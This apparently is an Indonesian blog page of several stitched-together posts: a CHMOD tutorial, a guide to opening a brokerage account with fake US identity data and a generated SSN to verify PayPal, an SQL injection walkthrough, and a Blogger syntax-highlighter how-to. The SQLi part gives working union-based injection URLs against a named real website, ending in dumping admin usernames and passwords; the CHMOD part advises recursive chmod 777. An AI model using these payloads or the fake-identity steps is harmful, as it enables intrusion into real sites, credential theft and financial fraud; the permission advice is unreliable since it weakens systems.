Pernah mendengar kata CHMOD? Saya juga baru tau apa itu CHMOD. Bagi pengguna sistem operasi Linux dan seorang web developper, mungkin kata tersebut sudah tidak asing lagi. CHMOD adalah kepanjangan dari Change Mode, sebuah perintah untuk memberi hak akses/permisions kepada pemilik, user biasa, dan non user (ini pengertian versi saya :) ). CHMOD inilah yang menjaga keamanan dari suatu data, jika ada user nakal yang berusaha untuk mengakses, mengubah, bahkan membaca data yang bukan haknya.
Ok, Langsung aja . .. Hak akses suatu data, disimbolkan dengan angka.
Jadi jika semuanya dijumlahkan menjadi 7, yang berarti suatu user mempunyai hak penuh akan data atau folder (direktori) tersebut. Suatu data dapat diakses oleh 3 user, yaitu root (pemilik data), user group, dan user non-group. Berikut contohnya :
Contoh CHMOD :
Chmod 753, berarti :
READ MORE
Ok, Langsung aja . .. Hak akses suatu data, disimbolkan dengan angka.
- 0 = Tidak ada hak akses
- 1 = Hak akses untuk masuk dan mengeksekusi suatu data atau folder (direktori)
- 2 = Hak akses untuk menulis/mengubah suatu data atau folder (direktori)
- 4 = Hak akses untuk membaca suatu data atau folder (direktori)
Jadi jika semuanya dijumlahkan menjadi 7, yang berarti suatu user mempunyai hak penuh akan data atau folder (direktori) tersebut. Suatu data dapat diakses oleh 3 user, yaitu root (pemilik data), user group, dan user non-group. Berikut contohnya :
Contoh CHMOD :
Chmod 753, berarti :
- 7 = 4+2+1 : root (pemilik file) mempunyai hak untuk mengeksekusi (1), menulis (2), dan membaca (4) suatu data atau direktori
- 5 = 4+1 : user group mempunyai hak untuk membaca (4) dan mengeksekusi (1) suatu data atau direktori
- 3 = 2+1 : user non group mempunyai hak untuk menulis (2) dan mengeksekusi suatu data atau direktori
Contoh Penggunaan CHMOD
Jika ingin mengubah hak akses dari suatu data atau direkori, dari hak akses 644 (setting default dari pihak hosting) menjadi 755 (agar dapat dibaca) berikut caranya :
chmod 755 [file_name]
chmod 755 index.php (untuk file)
chmod 755 /web/images (untuk folder/direktori)
Kalau ingin mengubah hak akses suatu folder yang di dalamnya ada banyak folder dan file, bisa menggunakan perintah berikut :
find [direktori] -type f -exec chmod 777 {} \; (untuk file)
find [direktori] -type d -exec chmod 777 {} \; (untuk folder / direktori)
CONTOH :
find /home/gathel/htdocs-linux -type f -exec chmod 777 {} \; (untuk file)
find /home/gathel/htdocs-linux -type d -exec chmod 777 {} \; (untuk folder / direktori)
Ok dan masih banyak lagi . . . ini cuman sebagian doank kok . ..
Gunakan VPN (ingat IP yg anda pake, IP US yahh)
Buat dulu EMAIL dan AKun paypai nya (Samakan semua data2 baik itu di email, pp dan VBA)
- Ke us.etrade.com/e/t/home dan Daftar Account Baru dengan mengklik "OPEN ACCOUNT". Klik "APPLY NOW" pada
- Sekarang Anda akan perlu untuk mengisi data2. JANGAN menggunakan data2 Anda yang sesungguhnya. Gunakan Generator Fake Name (Tanya om google, cari generator yg lengkap dgn info SSN nya, banyak kok )
(PENTING: Gunakan identitas dari AS)! Gunakan email yang dapat Anda akses. Untuk Rekening Type, Pilih" Individual account ".
- Untuk "Langkah 1: Pilih Account Type", Pilih "Cash Account Only".
- Masukkan alamat palsu dan nomor telepon yang Anda dapatkan dari fake name, dan pastikan bahwa kedua kotak dicentang!
- Sekarang Anda akan memerlukan SSN (Social Security Number). Seperti biasa, JANGAN menggunakan data Anda yang sesungguhnya. Gunakan Fake Name Generator. Juga pastikan Anda meletakkan "Country of Legal Residence " as " United State "dan klik" US Citizen ".
- Untuk "Employment Status" Mengenai pekerjaan anda. Pastikan itu adalah di kota yang sama, negara, zip, dan negara. JANGAN membuat alamat perusahaan/tempat kerja Anda sama seperti di mana alamat rumah anda berada. Pilih "No" untuk semua pilihan.
- Sekarang untuk "Sweep Account", Pilih yang pertama dan Pilih "No" untuk sisanya.
- Pastikan bahwa semua kotak dicentang dihilangkan pada "Select Documents for Electronic Delivery".
- Klik I accept dan No untuk kotak yg dicentang. (Just Click Continue)
- Sekarang pilih "No. I want to create a new user ID and password for this account ".
- Buatlah account yang dapat Anda ingat.
- Nggak perlu login, karena setelah anda create new user ID dan password, anda sudah dapat melihat Virtual BANK ACC Number di halaman tsb (sebelah kanan atas).
- Sekarang buka akun paypai anda, pergi ke "Add Bank Account" halaman dalam paypai.
- Masukkan routing number = 056073573.
- Masukkan Bank account number= Virtual bank acc number yg sudah anda dapatkan.
- Sekarang pergi ke halaman berikutnya dan masukkan informasi login Anda seperti yang anda buat di step 11 dan 12
- Pilih the Instant option dan silahkan tunggu beberapa menit.
- Done !!!!
Ok, Langsung aja gak usah banyak basa basi, ntar malah tambah basi . ..
1- Cari Target Di google dulu Pake dork nya terserah ente kalo di contoh ini, ane pake dork ini inurl:"news_id.php?id="
2- Kalo udah Nemu, Langsung di Check aja pake tanda ( ' ) di akhir url nya.Contoh :
3- ok saat nya exploitasi . . !!! menggunkan perintah order+by+1-- Contoh :
Berarti ada 5 Column lanjut ke step Selanjut nya
4- menggunakan perintah union+all+select+1,2,3,4,5-- Contoh :
fungsi buat inject web tersebut . . .
5- Menggunakan Perintah version() untuk melihat versi database MySQL nya !! Contoh :
nah ntar di website tersebut bakalan muncul versi database MySQL nya.
6- Menggunakan Perintah group_concat(table_name) trus di tambahain perintah ini
7- menggunkan perintah group_concat(column_name) dan di tambah perintah :
nah . .. ntar di situ bakalan muncul column column dari table login .
8- melihat isi column dari table login contoh :
tara !!!!! user name ama password udah keluar !!!! seperti di contoh ini !! username ama password dari admin gak di encrypt. tapi biasa nya username ama password di encrypt menggunakn MD5 kalo gak ya SH1
ok . . .. username ama password udah ketemu . .. berarti ente tinggal nyari halaman admin ama decrypt password (bagi yang password nya di encrypt lo)
Sekian dulu ... wasalam
READ MORE
1- Cari Target Di google dulu Pake dork nya terserah ente kalo di contoh ini, ane pake dork ini inurl:"news_id.php?id="
2- Kalo udah Nemu, Langsung di Check aja pake tanda ( ' ) di akhir url nya.Contoh :
http://luckyinternational.net/news/news_id.php?id=22msukin tanda ( ' ) di akhir url nya sehingga jadi kaya gini :
http://luckyinternational.net/news/news_id.php?id=22'Truzz . . ntar bakalan keluar error tapi gak usah di peduliin error nya . . . soal nya fungsi nya cuman buat nyari tau aja, apakah website tersebut bisa di SQLi apa gak . . . kalo keluar error, berarti bisa ... tapi ada juga lo yang gak keluar error tapi bisa di SQLi !!! ( Explor Your Brain )
3- ok saat nya exploitasi . . !!! menggunkan perintah order+by+1-- Contoh :
http://luckyinternational.net/news/news_id.php?id=22+order+by+1-- = Error nya ilang http://luckyinternational.net/news/news_id.php?id=22+order+by+2-- = Error nya ilang http://luckyinternational.net/news/news_id.php?id=22+order+by+3-- = Error nya ilang http://luckyinternational.net/news/news_id.php?id=22+order+by+4-- = Error nya ilang http://luckyinternational.net/news/news_id.php?id=22+order+by+5-- = Error nya ilang http://luckyinternational.net/news/news_id.php?id=22+order+by+6-- = Muncul Error !!
Berarti ada 5 Column lanjut ke step Selanjut nya
4- menggunakan perintah union+all+select+1,2,3,4,5-- Contoh :
http://luckyinternational.net/news/news_id.php?id=-22+union+all+select+1,2,3,4,5--Hasil nya, bakalan muncul NOMER AJAIB !!!
fungsi buat inject web tersebut . . .
5- Menggunakan Perintah version() untuk melihat versi database MySQL nya !! Contoh :
http://luckyinternational.net/news/news_id.php?id=-22+union+all+select+1,2,3,4,version()--
nah ntar di website tersebut bakalan muncul versi database MySQL nya.
6- Menggunakan Perintah group_concat(table_name) trus di tambahain perintah ini
+from+information_schema.tables+where+table_schema=database()--Contoh :
http://luckyinternational.net/news/news_id.php?id=-22+union+all+select+1,2,3,4,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()--nah, ntar disitu(di website nya bakalan keluar table table yang ada di database nya, truz ente cari table yang sekiranya itu buat nyimpen username ama password nya si admin ato si user . di contoh ini, ane ngambil table login habis itu ntar table nya di convert ke hexa pake tool ini ntar hasil nya kita pake di prosess selanjutnya
7- menggunkan perintah group_concat(column_name) dan di tambah perintah :
+from+information_schema.columns+where+table_name=0x hexa dari table--Contoh :
http://luckyinternational.net/news/news_id.php?id=-22+union+all+select+1,2,3,4,group_concat(column_name)+from+information_schema.tables+where+table_name=0x6c6f67696e--
nah . .. ntar di situ bakalan muncul column column dari table login .
8- melihat isi column dari table login contoh :
http://luckyinternational.net/news/news_id.php?id=-22+union+all+select+1,2,3,4,group_concat(username,0x3a,password)+from+login--
tara !!!!! user name ama password udah keluar !!!! seperti di contoh ini !! username ama password dari admin gak di encrypt. tapi biasa nya username ama password di encrypt menggunakn MD5 kalo gak ya SH1
ok . . .. username ama password udah ketemu . .. berarti ente tinggal nyari halaman admin ama decrypt password (bagi yang password nya di encrypt lo)
Sekian dulu ... wasalam
ada 3 langakah mudah, untuk menambahkan Syntax Highlighter di blogger biar ente bisa masukin kode-kode ente di blog ente.ok, langsung aja biar gak banyak cinconk.
yang ketiga, ente masukin kode-kode di bawah ini tepat di atas kode </body> udah taukan caranya buat nyari Tag </body> biar cepet . . . :) ni kode-kode yang harus segera ente masukin
READ MORE
- Login blogger dulu donk, habis itu langsung menuju ke rancangan truz pilih edit HTML nah disitu kan ada kode-kode yang berantakan. :) cari kode ini </HEAD> biar cepet, ente tekn ctrl + F Truz copy paste kode-kode di bawah ini, tepat diatas kode </HEAD>
Nah kalo udah masukin kode-kode yang tadi, sekarang ente masukin lagi kode-kode di bawa ini di atas kode </b:skin> biar cepet nie . .. tekan ctrl + F buat nyari kode tadi .nie kode-kode yang harus ente masukin.
.dp-highlighter { font-family: "Consolas", "Monaco", "Courier New", Courier, monospace; font-size: 12px; background-color: #E7E5DC; width: 99%; overflow: auto; margin: 18px 0 18px 0 !important; padding-top: 1px; /* adds a little border on top when controls are hidden */ } /* clear styles */ .dp-highlighter ol, .dp-highlighter ol li, .dp-highlighter ol li span { margin: 0; padding: 0; border: none; } .dp-highlighter a, .dp-highlighter a:hover { background: none; border: none; padding: 0; margin: 0; } .dp-highlighter .bar { padding-left: 45px; } .dp-highlighter.collapsed .bar, .dp-highlighter.nogutter .bar { padding-left: 0px; } .dp-highlighter ol { list-style: decimal; /* for ie */ background-color: #fff; margin: 0px 0px 1px 45px !important; /* 1px bottom margin seems to fix occasional Firefox scrolling */ padding: 0px; color: #5C5C5C; } .dp-highlighter.nogutter ol, .dp-highlighter.nogutter ol li { list-style: none !important; margin-left: 0px !important; } .dp-highlighter ol li, .dp-highlighter .columns div { list-style: decimal-leading-zero; /* better look for others, override cascade from OL */ list-style-position: outside !important; border-left: 3px solid #6CE26C; background-color: #F8F8F8; color: #5C5C5C; padding: 0 3px 0 10px !important; margin: 0 !important; line-height: 14px; } .dp-highlighter.nogutter ol li, .dp-highlighter.nogutter .columns div { border: 0; } .dp-highlighter .columns { background-color: #F8F8F8; color: gray; overflow: hidden; width: 100%; } .dp-highlighter .columns div { padding-bottom: 5px; } .dp-highlighter ol li.alt { background-color: #FFF; color: inherit; } .dp-highlighter ol li span { color: black; background-color: inherit; } /* Adjust some properties when collapsed */ .dp-highlighter.collapsed ol { margin: 0px; } .dp-highlighter.collapsed ol li { display: none; } /* Additional modifications when in print-view */ .dp-highlighter.printing { border: none; } .dp-highlighter.printing .tools { display: none !important; } .dp-highlighter.printing li { display: list-item !important; } /* Styles for the tools */ .dp-highlighter .tools { padding: 3px 8px 3px 10px; font: 9px Verdana, Geneva, Arial, Helvetica, sans-serif; color: silver; background-color: #f8f8f8; padding-bottom: 10px; border-left: 3px solid #6CE26C; } .dp-highlighter.nogutter .tools { border-left: 0; } .dp-highlighter.collapsed .tools { border-bottom: 0; } .dp-highlighter .tools a { font-size: 9px; color: #a0a0a0; background-color: inherit; text-decoration: none; margin-right: 10px; } .dp-highlighter .tools a:hover { color: red; background-color: inherit; text-decoration: underline; } /* About dialog styles */ .dp-about { background-color: #fff; color: #333; margin: 0px; padding: 0px; } .dp-about table { width: 100%; height: 100%; font-size: 11px; font-family: Tahoma, Verdana, Arial, sans-serif !important; } .dp-about td { padding: 10px; vertical-align: top; } .dp-about .copy { border-bottom: 1px solid #ACA899; height: 95%; } .dp-about .title { color: red; background-color: inherit; font-weight: bold; } .dp-about .para { margin: 0 0 4px 0; } .dp-about .footer { background-color: #ECEADB; color: #333; border-top: 1px solid #fff; text-align: right; } .dp-about .close { font-size: 11px; font-family: Tahoma, Verdana, Arial, sans-serif !important; background-color: #ECEADB; color: #333; width: 60px; height: 22px; } /* Language specific styles */ .dp-highlighter .comment, .dp-highlighter .comments { color: #008200; background-color: inherit; } .dp-highlighter .string { color: blue; background-color: inherit; } .dp-highlighter .keyword { color: #069; font-weight: bold; background-color: inherit; } .dp-highlighter .preprocessor { color: gray; background-color: inherit; }
nah . .. udah selesei tu !!! cuman gitu doank. tapi masih ada lagi cara buat manggil kode-kode yang tadi udah ente masukin ke blog ente.
caranya, buat manggil kode-kode itu . . pas ente mo posting, ente masuk ke mode HTML truz masukin kode ini ke postingan ente
taru disini kode yang mau ente masukin ke posting
Udah selesai . . . Hapy Posting With Syntax Highlighter On Blogger cmwiii